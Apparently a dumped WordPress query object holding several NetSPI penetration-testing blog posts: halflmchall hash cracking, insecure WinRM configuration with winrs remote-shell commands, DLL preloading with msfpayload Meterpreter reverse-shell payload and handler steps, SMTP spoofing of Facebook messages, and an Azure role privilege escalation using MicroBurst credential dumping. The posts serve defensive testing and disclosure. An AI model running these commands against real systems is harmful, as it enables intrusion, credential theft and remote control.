The primary risk that I see with intercepting Passbook files is fraud. Someone could potentially modify a pass to try and get a discount at a store, or maybe gain access to someone else’s rewards account. This can easily be stopped by using strong controls on the business’s side, but there’s always a risk of social engineering. For those developing Passbook integration for their applications, make sure all of your pass files are sent over securely encrypted channels and ensure that your business has strong controls to prevent tampering with Passbook passes. For those that would like a copy of the NetSPI pass shown above, email me karl.fosaaen@netspi.com. [post_title] => Hacking Passbook, the Real Way to do Extreme Couponing [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-passbook-the-real-way-to-do-extreme-couponing [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:24 [post_modified_gmt] => 2021-06-08 21:51:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1180 [menu_order] => 416 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [51] => WP_Post Object ( [ID] => 1184 [post_author] => 10 [post_date] => 2012-11-09 07:00:09 [post_date_gmt] => 2012-11-09 07:00:09 [post_content] => Frequently during penetration tests, we will capture halflmchall password hashes from the network. These can come from a variety of sources, but common sources include NBNS spoofing and SQL queries/SQL injection. Both methods can be easy ways to get halflmchall hashes during a pen test. For those who are unfamiliar with halflmchall hashes and how they are created, the process is pretty simple. When a client makes an authentication request with a server, the server responds with a challenge (which is basically a seed value used for hashing) for the client to use. If we are acting as the server, we can specify the challenge and the authentication protocol that we want to use. If we have a static challenge (1122334455667788) and a weak authentication protocol (LANMAN v1), we’re able to quickly look up the captured hashes in rainbow tables. Now, this isn’t the full technical detail of the process, but hopefully this gives you a good idea as to how this can work to our advantage. For a much more in-depth review of the process, here’s a great write up  - http://www.foofus.net/?page_id=63 The typical capture to cracked password process goes like this:
  1. Obtain a man-in-the-middle position, or force a server to authenticate to your evil server.
  2. Capture the hash (via SMB or HTTP servers).
  3. Look up the first 16 characters of the captured LM hash in the HalfLMChall rainbow tables.
  4. Use the cracked portion of the LM hash to feed into the John the Ripper netntlm.pl script to crack the rest of the LM hash.
  5. Feed the case insensitive password (from step 3) back into the netntlm.pl script to crack the case sensitive NTLM hash and get the full password.
The cracking process goes pretty quickly, but it does require multiple commands to  run that includes some copy and paste work. I’ve found that this process takes up more of my time than I would like, so I wrote a PowerShell script to automate the whole cracking process.

PowerShell cracking script requirements:

  1. The halflmchall rainbow tables
  2. Rcracki_mt
  3. John the Ripper (Jumbo release)
  4. Perl (required to run netntlm.pl)
  5. You will also need to enable PowerShell to run scripts: “Set-ExecutionPolicy RemoteSigned”
Within the script you will have to specify your John, rcrack, Perl, and rainbow table locations, but you should be able to run the script from any directory. The script usage is simple:
PS_MultiCrack.ps1 Input_File Output_File
You should be able to use the john formatted output file generated from the metasploit modules, but below is the basic format that the script will require:
DomainUser:::LMHASH:NTLMHASH:1122334455667788
ExampleTestAdmin:::daf4ce8f1965961138e76ee328e595e0c0c2d9a83fbe83fb:211af68207f7c88a1ad6c103a56966d1da1c1e91f02291f0:1122334455667788
The “1122334455667788” is the default static salt that is used by most of the tools used for capturing the hashes. It’s also the salt used by the rainbow tables (Download here). The script will write out each username and password to the output file when it’s done. Hashes that are already in the john.pot file will be prefixed in your output file as “Previously Cracked:” so that you don’t have to worry about cleaning out your input file as you add more hashes. Additionally, the script won’t go through the effort of cracking the same hash again, as that would be a waste of time. If you have any comments, suggestions, issues, please let me know through here or GitHub and I’ll try to address them. GitHub Repo [post_title] => Automating HalfLMChall Hash Cracking [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-halflmchall-hash-cracking [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:35 [post_modified_gmt] => 2021-04-13 00:05:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1184 [menu_order] => 419 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [52] => WP_Post Object ( [ID] => 1186 [post_author] => 10 [post_date] => 2012-10-29 07:00:09 [post_date_gmt] => 2012-10-29 07:00:09 [post_content] =>

Introduction - What is WinRM?

Windows Remote Management (WinRM) is a SOAP based protocol that can be used to remotely administer machines over the network. This is a handy tool for network admins that can also be used to automate tasks securely across multiple machines. However, it is fairly easy to misconfigure the service and/or abuse the service with legitimate account access.

How to mess up the WinRM configuration

In my personal experience with configuring the WinRM service, I have found it hard to get anything working correctly without completely removing security controls from the configuration. Scale my frustrations up to a domain level and you very quickly have poorly secured configs going out to hosts across a domain. It should be noted that the following commands should not be used for an actual WinRM configuration. These are just examples of the multiple ways that this service can be configured to run insecurely . Quick steps for configuring WinRM insecurely: Note: These are all commands that are run from a command shell with administrative privileges.
  1. Start the WinRM service. The only requirement to start the service is that none of your network interfaces can be set to “Public” in Windows. This typically isn’t an issue in domain environments. The command itself is not really a security issue, it’s just needed to actually run the WinRM service.winrm quickconfig
  2. Allow WinRM commands to be accepted through unencrypted channels (HTTP).winrm set winrm/config/service @{AllowUnencrypted="true"}
  3. Allow WinRM command to be sent through unencrypted channels (HTTP).winrm set winrm/config/client @{AllowUnencrypted="true"}
  4. Enable “Basic” network authentication for inbound WinRM connections to the server.winrm set winrm/config/service/auth @{Basic="true"}
  5. Enable “Basic” network authentication for outbound WinRM client connections. So, when you make a WinRM connection to another host with the local WinRM client, you can authenticate using “Basic” authentication.winrm set winrm/config/client/auth @{Basic="true"}
  6. Allow credentials to be relayed out to another host using the CredSSP protocol. This allows the host receiving commands to pass incoming credentials on to another host for authentication.winrm set winrm/config/service/auth @{CredSSP=”True”}
In order to authenticate against the service remotely, the authenticating account either has to be the same as the service account running the WinRM service, or a member of the local administrators group. This also means that any service set up to run scripted jobs through WinRM has to have access to credentials for a local administrator account.

What can we do with this?

Let’s assume that you have access to a host on a network and you have domain credentials, but there are no escalation points for you to follow on the host. If the WinRM service is set up to listen on other hosts in the domain, you may have the ability to use the service to gain remote access to the other hosts. Let’s say that you want to gain remote access to host 192.168.0.123 on the domain, but RDP is not enabled (or your account does not have RDP access). The open ports 5985 and 5986 (TCP) indicate that the WinRM service may be running on the remote host. You can identify the service with the following command:

winrm identify -r:http://192.168.0.123:5985 –auth:none

The response should look something like this:

IdentifyResponse ProtocolVersion = http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd ProductVendor = Microsoft Corporation ProductVersion = OS: 6.1.7601 SP: 1.0 Stack: 2.0

Once you’ve determined the service is running, you can try to run commands against the remote host with the Windows Remote Shell (winrs) command:

winrs -r:http://192.168.0.123:5985 -u:domainnameuseraccount "dir c:"

You can also use this with HTTPS on port 5986, as that may be your only option. If you change the “dir c:” to “cmd” you will have a remote shell on the host. That should look something like this:

winrs -r:http://192.168.0.123:5985 -u:domainnameuseraccount "cmd”

While the remote shell will only be running under your account’s privileges, there may be other escalation options on your new host.

Conclusion

As you can see, the WinRM service can be very powerful and useful for legitimately administering systems on the domain. It also can be used by attackers to work their way through the internal network. With any network service, determine your business need for the service before it is implemented. If the service is needed, then ensure that the service is securely configured before it is deployed. If you’re thinking about using WinRM, make sure that you only allow specific trusted hosts and limit users in your local administrators groups. [post_title] => Exploiting Trusted Hosts in WinRM [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-trusted-hosts-in-winrm [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:18 [post_modified_gmt] => 2021-04-13 00:05:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1186 [menu_order] => 421 [post_type] => post [post_mime_type] => [comment_count] => 5 [filter] => raw ) [53] => WP_Post Object ( [ID] => 1187 [post_author] => 10 [post_date] => 2012-10-22 07:00:09 [post_date_gmt] => 2012-10-22 07:00:09 [post_content] => DLL preloading (also known as sideloading and/or hijacking) is a common vulnerability in applications. The exploitation of the vulnerability is a simple file write (or overwrite) and then you have an executable running under the context of the application. The vulnerability is fairly easy to identify and even easier to exploit. In this blog, I will be showing you how identify and exploit DLL preloading vulnerabilities, as well as give you tips on how you can protect yourself from these vulnerabilities.

What is it?

DLL preloading happens when an application looks to call a DLL for execution and an attacker provides a malicious DLL to use instead. If the application is not properly configured, the application will follow a specific search path to locate the DLL. The application initially looks at its current directory (the one where the executable is located) for the DLL. If the DLL is not found in this location, the application will then continue on to the current working directory. This can be very helpful if the malicious DLL can be loaded along with a file, as the file and DLL can be accessed by multiple people on a network share. From there it’s on to the system directory, followed by the Windows directory, finally looking in the PATH environmental variable for the DLL. Properly configured applications will require specific paths and/or proper signatures for DLLs in order to use them. If an attacker has write access to the DLL or a location earlier within the search path, they can potentially cause the application to preload their malicious DLL.

How to identify vulnerable DLLs

Personally, I like to use Dependency Walker for static analysis on all of the DLLs that are called by the application. Note that Dependency Walker will not catch DLLS that are compiled into the application. For a more dynamic approach, you can use ProcMon. ProcMon can be used to identify vulnerable applications by identifying DLLs called during runtime. Using ProcMon for the Net Stumbler program, we can see that the application makes multiple calls to the MFC71ENU.DLL file. Dll We identify vulnerable DLLs by the locations that they are called from. If the location is controlled by an attacker, the application is potentially vulnerable. Here we can see that NetStumbler (version 0.4.0) is looking for the mfc71enu.dll file in a number of different directories, including the tools directory from which I opened a .ns1 NetStumbler file. This is not a guarantee that the application is vulnerable. The application may use some secondary measures (integrity checks) to prevent DLL tampering, but this is at least a good start for trying to attack the application.

How to exploit it

Once a vulnerable DLL is identified, the attack is fairly simple.
  1. Craft your malicious DLL with Metasploit
    1. msfpayload PAYLOAD LHOST=192.168.0.101 LPORT=8443 D > malicious_DLL.dll
      1. PAYLOAD, LHOST, and LPORT are up to you
      2. D denotes that you are creating a DLL payload
    2. Place the replacement DLL in the vulnerable directory and rename it to the name of the vulnerable DLL.
    3. Set up your listener
      1. Run the Metasploit console
      2. msf > use exploit/multi/handler
      3. msf exploit(handler) > set LHOST 127.0.0.1
      4. msf exploit(handler) > set LPORT 8443
      5. msf exploit(handler) > exploit –j
        1. This will start the listener as a job, allowing you to handle multiple ses-sions.
    4. Run the application (or open your file with the DLL in the same folder). Once the applica-tion makes the call to the vulnerable DLL, the Meterpreter payload will execute. If this is done on a network share, this could have a much greater impact.
    5. The Metasploit sessions –l will list out the active sessions and sessions –i (SessionNumber) will let you interact with the session.
For this version of Net Stumbler (0.4.0), the application is vulnerable through the mfc71enu.dll file. Below is an example of a malicious DLL placed in the directory of a Net Stumbler file. When the TestStuble.ns1 file is opened, the application will use the malicious DLL located in the current directory and create a Meterpreter session. Dll

How to fix it or prevent it

DLL preloading can be a helpful attack during a penetration test, but it doesn’t have to be a pain to fix. For application developers:
  • Require set paths for DLLs in applications
For system administrators:
  • Disable write permissions to relative application folders
  • Utilize least privilege access to prevent users (and applications) from having too much access to the system
For both groups:

Conclusion

As you can see, DLL preloading is still a common issue with applications. Hopefully this blog can help give you some insight on how the attack works and what you can do to lock down your applications to prevent this issue. If you want some examples of vulnerable applications, ExploitDB has a great list. [post_title] => Testing Applications for DLL Preloading Vulnerabilities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => testing-applications-for-dll-preloading-vulnerabilities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:23 [post_modified_gmt] => 2021-06-08 21:51:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1187 [menu_order] => 422 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [54] => WP_Post Object ( [ID] => 1190 [post_author] => 10 [post_date] => 2012-10-09 07:00:09 [post_date_gmt] => 2012-10-09 07:00:09 [post_content] => Recently Adam Caudill and ElcomSoft identified vulnerabilities in the way that UPEK fingerprint readers store Windows passwords in the registry. Adam has released a great proof-of-concept tool to decrypt these poorly encrypted passwords. I have access to a Lenovo T420 ThinkPad that features a UPEK fingerprint reader. The ThinkVantage Fingerprint Software is also vulnerable to this UPEK issue. The issue with the ThinkPad software affects credentials that are entered by the user in the ThinkVantage Fingerprint Software. Since I do not use the fingerprint reader for Active Directory authentication, I do not regularly update my password in the software. So when I initially ran the decryption tool, the tool came back with my password from several months ago. For users who regularily use the fingerprint reader for AD authentication, this could be a major issue. If you have this software on your machine and want to keep it on your machine, I would recommend the following:
  1. Set a disposable password for your Windows account
  2. Open up the “ThinkVantage Fingerprint Software” (Accessible from the ThinkVantage Client Security Solution menu)
  3. Enter your disposable password in the software and click “Submit”:Lenovo
  4. Close out the software and only authenticate to the application with your fingerprint.
  5. Once your password has been updated, it may be worth compiling Adam Caudill’s tool to double check that the password has been changed: https://github.com/brandonlw/upek-ps-pass-decryptLenovo
  6. Additionally, you can use the reveal password button to show the current password stored by the application.
  7. Finally, full disk encryption is a good idea, regardless of your use of a fingerprint reader. If someone steals your computer, full disk encryption will prevent them from recovering data (including registry keys) from the hard drive.
[post_title] => UPEK + Lenovo = Insecure Password Storage [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => upek-lenovo-insecure-password-storage [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:20 [post_modified_gmt] => 2021-06-08 21:51:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1190 [menu_order] => 425 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [55] => WP_Post Object ( [ID] => 1207 [post_author] => 10 [post_date] => 2012-05-24 07:00:09 [post_date_gmt] => 2012-05-24 07:00:09 [post_content] => In November of 2010, Facebook introduced their “@facebook.com” messaging option that gave users the opportunity to create their own facebook.com email address. Currently, all Facebook users have the ability to claim their own facebook.com email address. It’s easily accessible from the “messages” page, if your account has not already been set up for it. While the service is a nice way of communicating with non-Facebook friends via email and the Facebook message dashboard, there are some security issues that open up along with the service. Facebook accepts incoming email messages for delivery from their MX Record - smtpin.mx.facebook.com (66.220.155.14). These messages are currently being accepted for delivery based on their source IP address and whether or not the address is associated with a PTR record. This is supposed to prevent spoofing, but the mail server only checks the IP for a valid PTR record for that IP, and not if the domain of the sender’s email address matches the IP of the mail server. To fix this, Facebook needs to ensure that a message coming from a gmail.com address is originating from a Gmail mail server. Messages from non-PTR record IP addresses are stopped by the Facebook mail server. SMTP connection attempt from an IP without a PTR record:
$ telnet 66.220.155.14 25 Trying 66.220.155.14...
Connected to smtpin.mx.facebook.com (66.220.155.14).
Escape character is '^]'. 
554 5.1.8 DNS-P3 http://postmaster.facebook.com/response_codes? #dns-p No PTR Record
Connection closed by foreign host.
The Facebook mail server does however allow incoming messages from IPs with a PTR record, which allows us to spoof messages from other users. If you are behind an IP address with a PTR record, you can spoof a message from an external domain to a facebook.com email address. Currently, Facebook is properly blocking incoming messages spoofing a facebook.com domain. If Facebook gets breached, and their semi-private @facebook.com email addresses are leaked publicly, someone could easily start spoofing messages between users to propagate spam, phishing attacks, and/or malware. Right now, it’s not very hard to guess someone’s Facebook email address based off of their Facebook username, so Facebook needs to implement a filter that ensures the IP address from which a message originates matches the IP address of the MX record for the domain the message claims to come from. This will prove the sender of the message is on the same domain as the address they are claiming to represent. This does not outright remove the risk of spoofing between users, but it’s a good start. Currently Facebook does some notification on suspicious messages. This equates to a small yellow triangle in the right hand corner of the message. It’s not very obvious and could easily be interpreted as “important” or “urgent.” Facebook The above message was sent from my spoofed Gmail address to my @facebook.com address. It should be noted that Facebook is not the only site that falls victim to SMTP spoofing issues. Many of the social networking sites that allow users to accept emails as messages may be vulnerable to the same issues. [post_title] => Facebook message spoofing via SMTP [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-message-spoofing-via-smtp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:18 [post_modified_gmt] => 2021-06-08 21:51:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1207 [menu_order] => 442 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) ) [post_count] => 56 [current_post] => -1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based off the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AZPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.

Looking for an Azure pentesting partner? Consider NetSPI.

[post_title] => Escalating Azure Privileges with the Log Analytics Contributor Role [post_excerpt] => Learn how cloud pentesting expert Karl Fosaaen found and reported a Microsoft Azure vulnerability that allowed an Azure AD user to escalate from the Log Analytics Contributor role to the full Subscription Contributor role. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => escalating-azure-privileges-with-the-log-analystics-contributor-role [to_ping] => [pinged] => [post_modified] => 2021-09-10 16:41:52 [post_modified_gmt] => 2021-09-10 21:41:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11855 [menu_order] => 3 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 56 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => cb8a095dd489b7ce7da2e6b30d800830 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
Intro to Cloud Penetration Testing
Karl Fosaaen

Is your organization prepared for a ransomware attack? Explore our Ransomware Attack Simulation service.

X